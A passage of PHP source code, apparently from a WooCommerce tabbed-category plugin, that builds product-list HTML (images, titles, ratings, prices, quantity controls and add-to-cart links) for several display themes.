                    $html .= '<a class="product_out_of_stock" href="#"><i class="fa" aria-hidden="true"></i></a>';
                }
            endif;
            $html .= '<div class="clear"></div></div>';

                                           
            $qcld_woo_pro_minmax_dynamic_pricing_setting = get_option('qcld_woo_pro_minmax_dynamic_pricing_setting');

            if(function_exists('qcld_woo_pro_minmax_install') && (isset($qcld_woo_pro_minmax_dynamic_pricing_setting['qcld_woo_pro_minmax_price_table_on_off']) && $qcld_woo_pro_minmax_dynamic_pricing_setting['qcld_woo_pro_minmax_price_table_on_off'] == 'enable') ){

              $result_show = qcld_woo_pro_minmax_tabbed_dynamic_discount_price_table_show(get_the_ID());
              $html .= $result_show;
            }
            $html .= '</div></li>';

        endwhile;

    } else if ($theme_id == 'theme-eleven') {
        while ($product_query->have_posts()) : $product_query->the_post();
            $product = wc_get_product(get_the_ID());
            $product_stock_status = $product->get_stock_status();

            $html .= '<li class="'.qcld_product_product_has_gallery( get_the_ID() ).' qc_'.esc_attr($product_stock_status).'"><div class="product-box">';

                if(isset($link_title_to_modal) && ($link_title_to_modal == '1' || $link_title_to_modal == '01')){
                
                    $html .= '<a href="#" class="woo_tab_product_details too_tab_single_link" product-id="'.$product->get_id().'">';
                }else{ 
                    $html .= '<a href="' . $product->get_permalink() . '">';
                }
            $html .= '<div class="product-img">';
            if ( has_post_thumbnail() ):
            $html .= ''. $product->get_image('shop_catalog') .qcld_product_second_product_thumbnail(get_the_ID()).'';
            elseif(empty(has_post_thumbnail()) && empty(get_the_excerpt(get_the_ID()))):
            $html .= ''. $product->get_image('shop_catalog') .qcld_product_second_product_thumbnail(get_the_ID()).'';
            else:
            $html .= ''. strip_tags(substr(get_the_excerpt(get_the_ID()), 0, 150), '<br>') .'';
            endif;
            $html .= '<div class="eleven-description">'. strip_tags(substr(get_the_excerpt(get_the_ID()), 0, 150), '<br>').'</div></div></a>';

            if ($product->is_on_sale()):
                $html .= '<label for="qc_on_sale"><img src="' . QC_WOO_TAB_IMAGE_URL . '/sale.png"></label>';
            endif;

            if (get_option('product_title') == 1):

                if(isset($link_title_to_modal) && ($link_title_to_modal == '1' || $link_title_to_modal == '01')){
                
                    $html .= '<h2><a style="font-size: ' . get_option('change_title_text_size') . 'px; color: ' . get_option('product_title_text_color') . ';" href="#" class="woo_tab_product_details" product-id="'.$product->get_id().'">' . $product->get_title() . '</a></h2>';
                }else{ 
                    $html .= '<h2><a style="font-size: ' . get_option('change_title_text_size') . 'px; color: ' . get_option('product_title_text_color') . ';" href="' . $product->get_permalink() . '">' . $product->get_title() . '</a></h2>';
                }
            endif;
            if(get_option('qc_woo_tabbed_display_product_tag') == 'enable'){
            $html .= woo_tabbed_product_tags_by_id_ajax(get_the_ID());
            } 
            $average = $product->get_average_rating();

            if (get_option('display_rating') == 1):
                if ($average == 1) {
                    $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/1_star.png" alt="">';
                } else if ($average == 0) {
                    $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/no_star.png" alt="">';
                } else if ($average <= 2) {
                    $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/2_star.png" alt="">';
                } else if ($average <= 3) {
                    $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/3_star.png" alt="">';
                } else if ($average <= 4) {
                    $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/4_star.png" alt="">';
                } else if ($average <= 5) {
                    $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/5_star.png" alt="">';
                }
            endif;

            $html .= '<div class="product-bottom">';
            if (get_option('display_price') == 1):

                $html .= '<div style="font-size:' . get_option('product_content_text_size') . 'px; color: ' . get_option('product_content_text_color') . '" class="qc-woprice">' . $product->get_price_html() . '</div>';
            endif;


            $html .= '<div class="qc_quantity qc_qat_style_one">';

            if(get_option('qc_quick_view_on_off') != 'off'): 
            $html .= '<a href="#"  class="woo_tab_product_details" product-id="'.$product->get_id().'">
                    <i class="fa fa-info-circle" aria-hidden="true"></i></a>';
            endif; 
            if (get_option('add_quantity_select') == 1):
                if ($product_stock_status != 'outofstock'):
                if ($product->get_type() != 'variable'):
                    $qcld_woo_pro_minmax_enable_plugin = get_option( 'qcld_woo_pro_minmax_enable_plugin' );
                    if(function_exists('qcld_woo_pro_minmax_install') && isset($qcld_woo_pro_minmax_enable_plugin) && $qcld_woo_pro_minmax_enable_plugin  == 'yes'){
                        $response_min_max = qcld_woo_pro_minmax_tabbed_add_rules_text($product->get_id(),0);

                        $min_qty  = $response_min_max['min'];
                        $max_qty  = $response_min_max['max'];
                        $step_qty = $response_min_max['step'];

                        $html .= '<input class="qc_minus" type="button" value="-">
                        <input type="text" class="qc_product_quantity"
                               name="qcld_quantity" value="'.($min_qty ? $min_qty : 1).'" step="'.($step_qty ? $step_qty : '').'" min="'.($min_qty ? $min_qty : '').'" max="'.($max_qty ? $max_qty : '').'">
                        <input class="qc_plus" type="button" value="+">';

                    }else{


                        $html .= '<input class="qc_minus" type="button" value="-">
                        <input type="text" class="qc_product_quantity"
                               name="qcld_quantity" value="1">
                        <input class="qc_plus" type="button" value="+">';
                    }


                endif;
                endif;
            endif;
            if (get_option('add_cart_link') == 1):
                if ($product_stock_status != 'outofstock') {

                    if ($product->get_type() != 'variable'){
                      
                        $qc_woo_tabbed_cart_summary = get_option('qc_woo_tabbed_cart_summary_position');
                        if(isset($qc_woo_tabbed_cart_summary) && $qc_woo_tabbed_cart_summary == 'wooinstantcart' ):

                        $qcld_woo_pro_minmax_enable_plugin = get_option( 'qcld_woo_pro_minmax_enable_plugin' );
                        if(function_exists('qcld_woo_pro_minmax_install') && isset($qcld_woo_pro_minmax_enable_plugin) && $qcld_woo_pro_minmax_enable_plugin  == 'yes'){

                        $response_min_max = qcld_woo_pro_minmax_tabbed_add_rules_text($product->get_id(),0);
                        $min_qty  = $response_min_max['min'];
                        }else{
                        $min_qty  = 1;
                        }
                            $html .= ' <a  href="#"  class="ajax_add_to_cart add_to_cart_button product_type_simple woo_tab_s_p_add_to_cart" data-quantity="'.($min_qty ? $min_qty : 1).'" data-product_id="' . $product->get_id() . '" p-id="' . $product->get_id() . '"p-price="' . $product->get_price() . '" ><i
                            class="fa fa-cart-arrow-down" aria-hidden="true"></i></a>';
                        else:
                        $html .= '<a id="' . $product->get_id() . '" data-p-id="' . $product->get_id() . '" data-p-price="' . $product->get_price() . '" href="' . $product->add_to_cart_url() . '" class="woo_tab_s_p_add_to_cart"><i
                            class="fa fa-cart-arrow-down" aria-hidden="true"></i></a>';
                        endif;

                    }else{

                        $html .= '<a class="woo_tab_product_details" product-id="'.$product->get_id().'" href="#"><i class="fa fa-cart-arrow-down" aria-hidden="true"></i></a>';
                    }

                } else {

                    $html .= '<a  class="woo_tab_product_details" product-id="'.$product->get_id().'" href="#"><i
                            class="fa fa-cart-arrow-down" aria-hidden="true"></i></a>';
                }
            endif;


            $html .= '</div >';

            $html .= '<div class="clear"></div></div>';

                                           
            $qcld_woo_pro_minmax_dynamic_pricing_setting = get_option('qcld_woo_pro_minmax_dynamic_pricing_setting');

            if(function_exists('qcld_woo_pro_minmax_install') && (isset($qcld_woo_pro_minmax_dynamic_pricing_setting['qcld_woo_pro_minmax_price_table_on_off']) && $qcld_woo_pro_minmax_dynamic_pricing_setting['qcld_woo_pro_minmax_price_table_on_off'] == 'enable') ){

              $result_show = qcld_woo_pro_minmax_tabbed_dynamic_discount_price_table_show(get_the_ID());
              $html .= $result_show;
            }
            $html .= '</div></li>';
        endwhile;

    } else if ($theme_id == 'theme-nine') {
        while ($product_query->have_posts()) : $product_query->the_post();
            $product = wc_get_product(get_the_ID());
            $product_stock_status = $product->get_stock_status();

            $html .= '<li class="ilist-25">
                                    <div class="qc-wootabs-col-4">
                                        <div class="ilist-item-main">';

            if ($product->is_on_sale()):
                $html .= '<label for="qc_on_sale"><img
            src="' . QC_WOO_TAB_IMAGE_URL . '/sale.png"></label>';
            endif;
            $html .= '<div class="feature-img-box valign-center '.qcld_product_product_has_gallery( get_the_ID() ).'">';
            if(isset($link_title_to_modal) && ($link_title_to_modal == '1' || $link_title_to_modal == '01')){
                $html .= '<a href="#" class="woo_tab_product_details" product-id="'.$product->get_id().'">' . $product->get_image('shop_catalog') . '</a>';
            }else{
                $html .= '<a href="' . $product->get_permalink() . '">' . $product->get_image('shop_catalog') . qcld_product_second_product_thumbnail(get_the_ID()).'</a>';
            }
            $html .= '</div>';
            if(get_option('qc_woo_tabbed_display_product_tag') == 'enable'){
            $html .= woo_tabbed_product_tags_by_id_ajax(get_the_ID());
            } 

            $html .= '<div class="item-desc-text">';
            $average = $product->get_average_rating();

            if (get_option('display_rating') == 1):

                if ($average == 1) {
                    $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/1_star.png" alt="">';
                } else if ($average == 0) {
                    $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/no_star.png"alt="">';
                } else if ($average <= 2) {
                    $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/2_star.png"alt="">';
                } else if ($average <= 3) {
                    $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/3_star.png"alt="">';
                } else if ($average <= 4) {
                    $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/4_star.png"alt="">';
                } else if ($average <= 5) {
                    $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/5_star.png"alt="">';
                }

            endif;
            if (get_option('product_title') == 1):
               
                if(isset($link_title_to_modal) && ($link_title_to_modal == '1' || $link_title_to_modal == '01')){

                    $html .= '<h3 class="item-list-title"><a
                        style="color: ' . get_option('product_title_text_color') . ';font-size: ' . get_option('change_title_text_size') . 'px;"
                        style="color: ' . get_option('product_title_text_color') . ';font-size: ' . get_option('change_title_text_size') . 'px;"
                        href="#" class="woo_tab_product_details" product-id="'.$product->get_id().'">' . $product->get_title() . '</a>
                </h3>';
                }else{ 
                    $html .= '<h3 class="item-list-title"><a
                style="color: ' . get_option('product_title_text_color') . ';font-size: ' . get_option('change_title_text_size') . 'px;"
                style="color: ' . get_option('product_title_text_color') . ';font-size: ' . get_option('change_title_text_size') . 'px;"
                href="' . $product->get_permalink() . '">' . $product->get_title() . '</a>
                    </h3>';
                }

            endif;

            $html .= '<div class="tpl_nine_short_desc" style="font-size: ' . get_option('product_content_text_size') . 'px; color: ' . get_option('product_content_text_color') . ' !important;">' . strip_tags($product->get_short_description()) . '</div></div><div class="item-title-text">';

            if (get_option('display_price') == 1):
                $html .= '<div class="price_tabs"
             style="font-size: ' . get_option('product_content_text_size') . 'px; color: ' . get_option('product_content_text_color') . ';">' . $product->get_price_html() . '</div>';
            endif;

            $html .= '<div class="qc_quantity qc_qat_style_nine">';

            if(get_option('qc_quick_view_on_off') != 'off'): 
            $html .= '<a href="#"  class="woo_tab_product_details" product-id="'.$product->get_id().'">
                    <i class="fa fa-info-circle" aria-hidden="true"></i></a>';
            endif; 

            if (get_option('add_quantity_select') == 1):
                if ($product_stock_status != 'outofstock'):
                    if ($product->get_type() != 'variable'):

                    $qcld_woo_pro_minmax_enable_plugin = get_option( 'qcld_woo_pro_minmax_enable_plugin' );
                    if(function_exists('qcld_woo_pro_minmax_install') && isset($qcld_woo_pro_minmax_enable_plugin) && $qcld_woo_pro_minmax_enable_plugin  == 'yes'){
                        $response_min_max = qcld_woo_pro_minmax_tabbed_add_rules_text($product->get_id(),0);

                        $min_qty  = $response_min_max['min'];
                        $max_qty  = $response_min_max['max'];
                        $step_qty = $response_min_max['step'];

                        $html .= '<input class="qc_minus" type="button" value="-">
                                <input type="text" class="qc_product_quantity" name="qcld_quantity" value="'.($min_qty ? $min_qty : 1).'" step="'.($step_qty ? $step_qty : '').'" min="'.($min_qty ? $min_qty : '').'" max="'.($max_qty ? $max_qty : '').'">
                                <input class="qc_plus" type="button" value="+">';

                        }else{


                        $html .= '<input class="qc_minus" type="button" value="-">
                                <input type="text" class="qc_product_quantity" name="qcld_quantity" value="1">
                                <input class="qc_plus" type="button" value="+">';
                        }

                    endif;
                endif;
            endif;
                if (get_option('add_cart_link') == 1):
                    if ($product_stock_status != 'outofstock') {

                    if ($product->get_type() != 'variable'){
                        
                        $qc_woo_tabbed_cart_summary = get_option('qc_woo_tabbed_cart_summary_position');
                        if(isset($qc_woo_tabbed_cart_summary) && $qc_woo_tabbed_cart_summary == 'wooinstantcart' ):

                        $qcld_woo_pro_minmax_enable_plugin = get_option( 'qcld_woo_pro_minmax_enable_plugin' );
                        if(function_exists('qcld_woo_pro_minmax_install') && isset($qcld_woo_pro_minmax_enable_plugin) && $qcld_woo_pro_minmax_enable_plugin  == 'yes'){

                        $response_min_max = qcld_woo_pro_minmax_tabbed_add_rules_text($product->get_id(),0);
                        $min_qty  = $response_min_max['min'];
                        }else{
                        $min_qty  = 1;
                        }
                            $html .= ' <a  href="#"  class="ajax_add_to_cart add_to_cart_button product_type_simple woo_tab_s_p_add_to_cart" data-quantity="'.($min_qty ? $min_qty : 1).'" data-product_id="' . $product->get_id() . '" p-id="' . $product->get_id() . '"p-price="' . $product->get_price() . '" ><i
                            class="fa fa-cart-arrow-down" aria-hidden="true"></i></a>';
                        else:
                        $html .= '<a id="' . $product->get_id() . '" data-p-id="' . $product->get_id() . '" data-p-price="' . $product->get_price() . '" href="' . $product->add_to_cart_url() . '" class="woo_tab_s_p_add_to_cart"><i
                            class="fa fa-cart-arrow-down" aria-hidden="true"></i></a>';
                        endif;

                    }else{

                        $html .= '<a  class="woo_tab_product_details" product-id="'.$product->get_id().'" href="#"><i class="fa fa-cart-arrow-down" aria-hidden="true"></i></a>';
                    }

                    } else {
                        $html .= '<a class="woo_tab_s_p_add_to_carts" data-p-price="'.$product->get_price().'" data-p-id="'.$product->get_id().'" href="'.$product->get_permalink().'"><i class="fa fa-cart-arrow-down" aria-hidden="true"></i></a>';
                    }
                endif;


            $html .= '</div></div>';

                                           
            $qcld_woo_pro_minmax_dynamic_pricing_setting = get_option('qcld_woo_pro_minmax_dynamic_pricing_setting');

            if(function_exists('qcld_woo_pro_minmax_install') && (isset($qcld_woo_pro_minmax_dynamic_pricing_setting['qcld_woo_pro_minmax_price_table_on_off']) && $qcld_woo_pro_minmax_dynamic_pricing_setting['qcld_woo_pro_minmax_price_table_on_off'] == 'enable') ){

              $result_show = qcld_woo_pro_minmax_tabbed_dynamic_discount_price_table_show(get_the_ID());
              $html .= $result_show;
            }
            $html .= '</div></div></li>';

        endwhile;

    } else if ($theme_id == 'theme-four') {
        $add_to_cart_text = get_option('change_add_to_cart_button_text');
        while ($product_query->have_posts()) : $product_query->the_post();
            $product = wc_get_product(get_the_ID());
            $product_stock_status = $product->get_stock_status();
            $html .= '<li class="'.qcld_product_product_has_gallery( get_the_ID() ).'" style="background-color:' . get_option('container_background_color') . '">
                                    <div class="qc-product-list">';
            if ($product->is_on_sale()):
                $html .= '<label for="qc_on_sale"><img src="' . QC_WOO_TAB_IMAGE_URL . '/sale.png"></label>';
            endif;
            $html .= '<div class="qc-product-details-left"><a href="'. $product->get_permalink() .'">' . $product->get_image('shop_catalog') . qcld_product_second_product_thumbnail(get_the_ID()).'</a></div>
                                        <div class="qc-product-details-right">';

            if (get_option('product_title') == 1):
                
                if(isset($link_title_to_modal) && ($link_title_to_modal == '1' || $link_title_to_modal == '01')){
                
                $html .= '<h2><a style="font-size: ' . get_option('change_title_text_size') . 'px; color: ' . get_option('product_title_text_color') . ';" href="#" class="woo_tab_product_details" product-id="'.$product->get_id().'">' . $product->get_title() . '</a></h2>';
            }else{ 
                $html .= '<h2><a style="color: ' . get_option('product_title_text_color') . ';font-size: ' . get_option('change_title_text_size') . 'px;" href="' . $product->get_permalink() . '">' . $product->get_title() . '</a></h2>';
            }
            endif;
            
            if( !empty(strip_tags($product->get_short_description()))){
            $html .= '<div class="tpl_four_short_desc" style="font-size: '.get_option('product_content_text_size').'px; color: '.get_option('product_content_text_color').' !important;">'.strip_tags($product->get_short_description()).'</div>';
            }

            if(get_option('qc_woo_tabbed_display_product_tag') == 'enable'){
            $html .= woo_tabbed_product_tags_by_id_ajax(get_the_ID());
            } 
            $average = $product->get_average_rating();

            if (get_option('display_rating') == 1):
                $html .= '<div class="qcld_woo_product_rating">';
                if ($average == 1) {
                    $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/1_star.png" alt="">';
                } else if ($average == 0) {
                    $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/no_star.png" alt="">';
                } else if ($average <= 2) {
                    $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/2_star.png" alt="">';
                } else if ($average <= 3) {
                    $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/3_star.png" alt="">';
                } else if ($average <= 4) {
                    $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/4_star.png" alt="">';
                } else if ($average <= 5) {
                    $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/5_star.png" alt="">';
                }
                $html .= '</div>';

            endif;

               $html .= '<h3 style="font-size: ' . get_option('product_content_text_size') . 'px;color:' . get_option('product_content_text_color') . '">';
            if (get_option('display_price') == 1):
                $html .=  $product->get_price_html();
            endif;


            if(get_option('qc_quick_view_on_off') != 'off'): 
            $html .= '<a href="#"  class="woo_tab_product_details" product-id="'.$product->get_id().'">
                    <i class="fa fa-info-circle" aria-hidden="true"></i></a>';
            endif; 

                $html .= '</h3>';
            if (get_option('add_cart_link') == 1):
                if ($product_stock_status != 'outofstock') {
                    if (!empty($add_to_cart_text)) {
                        $anchorText = esc_html($add_to_cart_text, 'woo-tabbed-category' );
                    } else {
                        $anchorText = esc_html('Add To Cart', 'woo-tabbed-category' );
                    }


                    if (get_option('add_quantity_select') == 1):

                    $qcld_woo_pro_minmax_enable_plugin = get_option( 'qcld_woo_pro_minmax_enable_plugin' );
                    if(function_exists('qcld_woo_pro_minmax_install') && isset($qcld_woo_pro_minmax_enable_plugin) && $qcld_woo_pro_minmax_enable_plugin  == 'yes'){
                        $response_min_max = qcld_woo_pro_minmax_tabbed_add_rules_text($product->get_id(),0);

                        $min_qty  = $response_min_max['min'];
                        $max_qty  = $response_min_max['max'];
                        $step_qty = $response_min_max['step'];

                            $html .= ' <div class="qc_quantity">';
                            $html .= '<input class="qc_minus" type="button" value="-">           
                            <input id="qty_' . $product->get_id() . '" type="text" class="qc_product_quantity" name="qcld_quantity" value="'.($min_qty ? $min_qty : 1).'" step="'.($step_qty ? $step_qty : '').'" min="'.($min_qty ? $min_qty : '').'" max="'.($max_qty ? $max_qty : '').'">
                            <input class="qc_plus" type="button" value="+">';

                        }else{

                            $html .= ' <div class="qc_quantity">';
                            $html .= '<input class="qc_minus" type="button" value="-">           
                            <input id="qty_' . $product->get_id() . '" type="text" class="qc_product_quantity" name="qcld_quantity" value="1">
                            <input class="qc_plus" type="button" value="+">';
                        }


                    endif;

                    $qc_woo_tabbed_cart_summary = get_option('qc_woo_tabbed_cart_summary_position');
                    if(isset($qc_woo_tabbed_cart_summary) && $qc_woo_tabbed_cart_summary == 'wooinstantcart' ):

                        $qcld_woo_pro_minmax_enable_plugin = get_option( 'qcld_woo_pro_minmax_enable_plugin' );
                        if(function_exists('qcld_woo_pro_minmax_install') && isset($qcld_woo_pro_minmax_enable_plugin) && $qcld_woo_pro_minmax_enable_plugin  == 'yes'){

                        $response_min_max = qcld_woo_pro_minmax_tabbed_add_rules_text($product->get_id(),0);
                        $min_qty  = $response_min_max['min'];
                        }else{
                        $min_qty  = 1;
                        }
                        $html .= ' <a  href="#"  class="ajax_add_to_cart add_to_cart_button product_type_simple qc-cart-btn woo_tab_s_p_add_to_cart" data-quantity="'.($min_qty ? $min_qty : 1).'" data-product_id="' . $product->get_id() . '" p-id="' . $product->get_id() . '"p-price="' . $product->get_price() . '" ><i
                        class="fa fa-cart-arrow-down" aria-hidden="true"></i></a>';
                    else:
                    $html .= '<a id="' . $product->get_id() . '" data-p-id="' . $product->get_id() . '" data-p-price="' . $product->get_price() . '" href="' . $product->add_to_cart_url() . '" class="qc-cart-btn woo_tab_s_p_add_to_cart"><i
                        class="fa fa-cart-arrow-down" aria-hidden="true"></i></a>';
                    endif;

                 $html .='</div>';
                                  
                    $html .= '</div>';
            $qcld_woo_pro_minmax_dynamic_pricing_setting = get_option('qcld_woo_pro_minmax_dynamic_pricing_setting');

            if(function_exists('qcld_woo_pro_minmax_install') && (isset($qcld_woo_pro_minmax_dynamic_pricing_setting['qcld_woo_pro_minmax_price_table_on_off']) && $qcld_woo_pro_minmax_dynamic_pricing_setting['qcld_woo_pro_minmax_price_table_on_off'] == 'enable') ){

              $result_show = qcld_woo_pro_minmax_tabbed_dynamic_discount_price_table_show(get_the_ID());
              $html .= $result_show;
            }

                    $html .= '</div>';


                } else {

                    $html .= '<a id="' . $product->get_id() . '" data-p-id="' . $product->get_id() . '" data-p-price="' . $product->get_price() . '" href="' . $product->get_permalink() . '"
                                               class="qc-cart-btn">Out Of Stock</a>';
                }
            endif;

         
            $html .= '</li>';
        endwhile;
        wp_reset_query();

    } else if ($theme_id == 'theme-five') {
        while ($product_query->have_posts()) : $product_query->the_post();
            $product = wc_get_product(get_the_ID());
            $product_stock_status = $product->get_stock_status();
            $html .= '<li  class="'.qcld_product_product_has_gallery( get_the_ID() ).'">';
            $html .= '<div class="qc_tabs_10_style_box">';
            if ($product->is_on_sale()):
                $html .= '<label for="qc_on_sale"><img
                        src="' . QC_WOO_TAB_IMAGE_URL . '/sale.png"></label>';
            endif;
            if (get_option('product_title') == 1):
                if(isset($link_title_to_modal) && ($link_title_to_modal == '1' || $link_title_to_modal == '01')){
                
                    $html .= '<h2><a style="font-size: ' . get_option('change_title_text_size') . 'px; color: ' . get_option('product_title_text_color') . ';" href="#" class="woo_tab_product_details" product-id="'.$product->get_id().'">' . $product->get_title() . '</a></h2>';
                }else{ 
                    $html .= '<h2><a style="font-size: ' . get_option('change_title_text_size') . 'px; color: ' . get_option('product_title_text_color') . ';" href="' . $product->get_permalink() . '">' . $product->get_title() . '</a></h2>';
                }
            endif;

            if (get_option('display_price') == 1):
                $html .= '<div class="qc_price">' . $product->get_price_html() . '</div>';
            endif;
            if(get_option('qc_woo_tabbed_display_product_tag') == 'enable'){
            $html .= woo_tabbed_product_tags_by_id_ajax(get_the_ID());
            } 

            $html .= '<div class="qc_ratting">';
            $average = $product->get_average_rating();

            if (get_option('display_rating') == 1):
                if ($average == 1) {
                    $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/1_star.png" alt="">';
                } else if ($average == 0) {
                    $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/no_star.png" alt="">';
                } else if ($average <= 2) {
                    $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/2_star.png" alt="">';
                } else if ($average <= 3) {
                    $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/3_star.png" alt="">';
                } else if ($average <= 4) {
                    $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/4_star.png" alt="">';
                } else if ($average <= 5) {
                    $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/5_star.png" alt="">';
                }

            endif;
            $html .= '</div>
            <div class="divider"></div>
            <div class="pro_img">' . $product->get_image('shop_catalog') . qcld_product_second_product_thumbnail(get_the_ID()).'</div>';
         $qcld_woo_pro_minmax_dynamic_pricing_setting = get_option('qcld_woo_pro_minmax_dynamic_pricing_setting');

            if(function_exists('qcld_woo_pro_minmax_install') && (isset($qcld_woo_pro_minmax_dynamic_pricing_setting['qcld_woo_pro_minmax_price_table_on_off']) && $qcld_woo_pro_minmax_dynamic_pricing_setting['qcld_woo_pro_minmax_price_table_on_off'] == 'enable') ){

              $result_show = qcld_woo_pro_minmax_tabbed_dynamic_discount_price_table_show(get_the_ID());
              $html .= $result_show;
            }
        $html .= '</div>';


            if ($product_stock_status != 'outofstock') {
                $html .= '<div class="qc_tabs_10_style_box_hover">
                <div class="qc_tabs_10_style_box_details">';
                if (get_option('product_title') == 1):
                    $html .= '<h2>
                            <a style="color: '.get_option('product_title_text_color').';font-size: '.get_option('change_title_text_size').'px;"
                               href="' . $product->get_permalink() . '">' . $product->get_title() . '</a>
                        </h2>';
                endif;
                
                $html .= '<div style="font-size: ' . get_option('product_content_text_size') . 'px; color: ' . get_option('product_content_text_color') . ';"
                             class="qc_price">';
                if (get_option('display_price') == 1):
                    $html .= $product->get_price_html();
                endif;

                if(get_option('qc_quick_view_on_off') != 'off'): 
                $html .= '<a href="#"  class="woo_tab_product_details" product-id="'.$product->get_id().'">
                        <i class="fa fa-info-circle" aria-hidden="true"></i></a>';
                endif; 
                
                $html .= '</div>';
            if(get_option('qc_woo_tabbed_display_product_tag') == 'enable'){
            $html .= woo_tabbed_product_tags_by_id_ajax(get_the_ID());
            } 
                                           
            $qcld_woo_pro_minmax_dynamic_pricing_setting = get_option('qcld_woo_pro_minmax_dynamic_pricing_setting');

            if(function_exists('qcld_woo_pro_minmax_install') && (isset($qcld_woo_pro_minmax_dynamic_pricing_setting['qcld_woo_pro_minmax_price_table_on_off']) && $qcld_woo_pro_minmax_dynamic_pricing_setting['qcld_woo_pro_minmax_price_table_on_off'] == 'enable') ){

              $result_show = qcld_woo_pro_minmax_tabbed_dynamic_discount_price_table_show(get_the_ID());
              $html .= $result_show;
            }


                $html .= '<div class="qc_ratting">';
                $average = $product->get_average_rating();

                if (get_option('display_rating') == 1):
                    if ($average == 1) {
                        $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/1_star.png" alt="">';
                    } else if ($average == 0) {
                        $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/no_star.png" alt="">';
                    } else if ($average <= 2) {
                        $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/2_star.png" alt="">';
                    } else if ($average <= 3) {
                        $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/3_star.png" alt="">';
                    } else if ($average <= 4) {
                        $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/4_star.png" alt="">';
                    } else if ($average <= 5) {
                        $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/5_star.png" alt="">';
                    }

                endif;
                $html .= '</div><div class="qc_tabs_10_style_box_icon">';
                $html.='<ul>';

                if (get_option('product_title') == 1):
                    if(isset($link_title_to_modal) && ($link_title_to_modal == '1' || $link_title_to_modal == '01')){
                    $html .= '<li><a href="#" class="woo_tab_product_details" product-id="'.$product->get_id().'"><i class="fa fa-link" aria-hidden="true"></i></a> </li>';
                    }else{
                    $html .= '<li><a href="' . $product->get_permalink() . '"><i class="fa fa-link" aria-hidden="true"></i></a> </li>';
                    }

                endif;


                if (get_option('add_quantity_select') == 1):
                    if ($product->get_type() != 'variable'):

                        $qcld_woo_pro_minmax_enable_plugin = get_option( 'qcld_woo_pro_minmax_enable_plugin' );
                    if(function_exists('qcld_woo_pro_minmax_install') && isset($qcld_woo_pro_minmax_enable_plugin) && $qcld_woo_pro_minmax_enable_plugin  == 'yes'){
                        $response_min_max = qcld_woo_pro_minmax_tabbed_add_rules_text($product->get_id(),0);

                        $min_qty  = $response_min_max['min'];
                        $max_qty  = $response_min_max['max'];
                        $step_qty = $response_min_max['step'];


                            $html .= '<li><div class="qc_quantity qc_qat_style_five">';
                            $html .= ' <input class="qc_minus" type="button" value="-">
                                    <input type="text" class="qc_product_quantity"
                                           name="qcld_quantity" value="'.($min_qty ? $min_qty : 1).'" step="'.($step_qty ? $step_qty : '').'" min="'.($min_qty ? $min_qty : '').'" max="'.($max_qty ? $max_qty : '').'">
                                    <input class="qc_plus" type="button" value="+"></div></li>';

                        }else{

                            $html .= '<li><div class="qc_quantity qc_qat_style_five">';
                            $html .= ' <input class="qc_minus" type="button" value="-">
                                    <input type="text" class="qc_product_quantity"
                                           name="qcld_quantity"
                                           value="1">
                                    <input class="qc_plus" type="button" value="+"></div></li>';
                        }



                    endif;
                endif;
                if (get_option('add_cart_link') == 1):

                    if ($product->get_type() != 'variable'){
                        
                        $qc_woo_tabbed_cart_summary = get_option('qc_woo_tabbed_cart_summary_position');
                        if(isset($qc_woo_tabbed_cart_summary) && $qc_woo_tabbed_cart_summary == 'wooinstantcart' ):

                        $qcld_woo_pro_minmax_enable_plugin = get_option( 'qcld_woo_pro_minmax_enable_plugin' );
                        if(function_exists('qcld_woo_pro_minmax_install') && isset($qcld_woo_pro_minmax_enable_plugin) && $qcld_woo_pro_minmax_enable_plugin  == 'yes'){

                        $response_min_max = qcld_woo_pro_minmax_tabbed_add_rules_text($product->get_id(),0);
                        $min_qty  = $response_min_max['min'];
                        }else{
                        $min_qty  = 1;
                        }
                            $html .= ' <li><a  href="#"  class="ajax_add_to_cart add_to_cart_button product_type_simple woo_tab_s_p_add_to_cart" data-quantity="'.($min_qty ? $min_qty : 1).'" data-product_id="' . $product->get_id() . '" p-id="' . $product->get_id() . '"p-price="' . $product->get_price() . '" ><i
                            class="fa fa-cart-plus" aria-hidden="true"></i>   </a></li>';
                        else:
                        $html .= '<li><a id="' . $product->get_id() . '" data-p-id="' . $product->get_id() . '" data-p-price="' . $product->get_price() . '" href="' . $product->add_to_cart_url() . '" class="woo_tab_s_p_add_to_cart"><i
                            class="fa fa-cart-plus" aria-hidden="true"></i></a></li>';
                        endif;

                    }else{

                        $html .= '<li><a class="woo_tab_product_details" product-id="'.$product->get_id().'" href="#"><i class="fa fa-cart-arrow-down" aria-hidden="true"></i></a></li>';
                    }

                endif;


                $html .= '</ul></div></div></div>';

            } else {
                $html .= '<div class="qc_tabs_10_style_box_hover">
                <div class="qc_tabs_10_style_box_details">

                    <div class="qc_tabs_10_style_box_icon">
                        <ul>';

                if (get_option('product_title') == 1):
                    
